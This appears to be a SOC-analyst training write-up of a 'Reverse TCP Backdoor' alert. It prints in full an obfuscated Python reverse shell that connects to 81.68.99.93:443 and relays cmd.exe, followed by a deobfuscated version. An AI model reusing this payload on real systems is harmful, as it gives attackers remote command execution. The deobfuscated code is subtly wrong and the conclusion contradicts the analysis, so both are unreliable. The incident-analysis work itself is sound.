# Details
EventID : 67
Event Time : Mar, 01, 2021, 03:15 PM
Rule : SOC131 - Reverse TCP Backdoor Detected
Level : Security Analyst
Source Address : 172.16.17.14
Source Hostname : MikeComputer
File Name : msi.bat
File Hash : 3dc649bc1be6f4881d386e679b7b60c8
File Size : 2,12 KB
Device Action : Cleaned
Download (Password:infected) : 3dc649bc1be6f4881d386e679b7b60c8.zip

# Static Analysis
- File type is `.bat` `msi.bat: ASCII text, with very long lines, with CRLF line terminators`

## Scanners
- No flag by vendors
![Scan Results](capture.PNG)

## Analysis of file code.
```py
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('81.68.99.93', 443)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
```
- Looks like it's running it with python, we see an IP immediately that it tries to connect along with the port.
```sh
'81.68.99.93', 443
```
- We also see some potential program it may be trying to use it with.
```cmd
\\windows\\system32\\cmd.exe
```
- Trying to look up the IP in our log end-point security looks like it's an external IP
- Looking also the IP in the log reveals no logs which mean it wasn't accessed, this goes with the statement saying the script was cleaned.

# Code Deobfuscation
- We can try to deobfuscate it using chatgpt
```py
import os
import socket
import subprocess
import threading
import contextlib

def p2s(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)
        else:
            break

def s2p(s, p):
    while True:
        p.stdout.read(1)
        s.send(p.stdout.read(1))

with contextlib.nested(
    socket.socket(socket.AF_INET, socket.SOCK_STREAM),
    subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
) as (s, p):
    try:
        s.connect(('81.68.99.93', 443))
        threading.Thread(target=s2p, args=[s, p], daemon=True).start()
        threading.Thread(target=p2s, args=[s, p], daemon=True).start()
    except KeyboardInterrupt:
        s.close()
        p.wait()

```
- From the code, we can make sense how this script works, it connect to the IP and spawns a subprocess alongside establishing socket communication.

# Conclusion
- While there isn't any malicious things we see in this script, it connecting to something to anexternal IP while the IP is flagged malicious is a sign for us to be warned against this. So this is true positive.


